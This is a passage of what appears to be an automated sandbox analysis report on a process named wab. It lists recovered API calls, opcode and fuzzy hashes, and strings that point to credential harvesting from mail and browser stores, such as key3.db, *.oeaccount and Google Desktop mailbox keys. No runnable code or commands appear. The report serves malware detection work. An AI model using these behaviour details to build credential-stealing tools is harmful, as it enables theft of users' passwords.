                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                                                • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                  • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                  • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                  • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                  • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                  • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                  • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                • String ID: $
                                                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                                                • Opcode ID: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                • Instruction ID: 00843a31076853278f863d8e49a3b1dedc6e53575b175ed212c8a3462f8966d2
                                                                                                                                                • Opcode Fuzzy Hash: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                • Instruction Fuzzy Hash: 4D318F70640259BFEF229B52DC89D6F3A7CFBC5B88F10006DF401792A1CA794F51EA69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                  • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                  • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                  • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID: C@$key3.db
                                                                                                                                                • API String ID: 1968906679-1993167907
                                                                                                                                                • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                • memset.MSVCRT ref: 00407FCE
                                                                                                                                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040801C
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00408039
                                                                                                                                                Strings
                                                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00407FA6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                                                • Opcode ID: cddc1c4639ed352c6b00522a74a8640079b1fef2a24954c474c6d8e722691f2e
                                                                                                                                                • Instruction ID: ef1d8a4e040050e039b627d4d2b4e2291b822c72ed16119247eb6dd3c2076bbf
                                                                                                                                                • Opcode Fuzzy Hash: cddc1c4639ed352c6b00522a74a8640079b1fef2a24954c474c6d8e722691f2e
                                                                                                                                                • Instruction Fuzzy Hash: 4A118F72408245BBD710EE51DC41EABBBACEBD0314F00083EBE9491191EB759A58D7A7
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                  • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                • String ID: +_@$l
                                                                                                                                                • API String ID: 3436799508-640399337
                                                                                                                                                • Opcode ID: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                • Instruction ID: dfa99e5f235914639cafa3f1faff2c73f9381d0964b1719e4b49f1177e3774cc
                                                                                                                                                • Opcode Fuzzy Hash: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                • Instruction Fuzzy Hash: B411A172904198CBDF209B24CC44BCA7BB9AF90304F0900F5A94C7B2D2C7B55E89CFA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                  • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                • String ID: 8D
                                                                                                                                                • API String ID: 3951308622-2703402624
                                                                                                                                                • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                                                • String ID: Password2
                                                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                                                • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                • API String ID: 2574300362-543337301
                                                                                                                                                • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: rows deleted
                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                • Opcode ID: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                • Instruction ID: 593c26daf5a8157ef64f6677eb97e14ee4fb597551c84e1e3d2c0423d94ab2b3
                                                                                                                                                • Opcode Fuzzy Hash: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                • Instruction Fuzzy Hash: DE01FCB5A40B0077E235AA35CC03F1A73A4AFD1718F000B1EF252666D2E7BCE509856D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: +MA$psow$winOpen
                                                                                                                                                • API String ID: 2221118986-3077801942
                                                                                                                                                • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                                                • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                • API String ID: 3510742995-3459038510
                                                                                                                                                • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                • memset.MSVCRT ref: 0040269F
                                                                                                                                                  • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                  • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                  • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1593657333-0
                                                                                                                                                • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
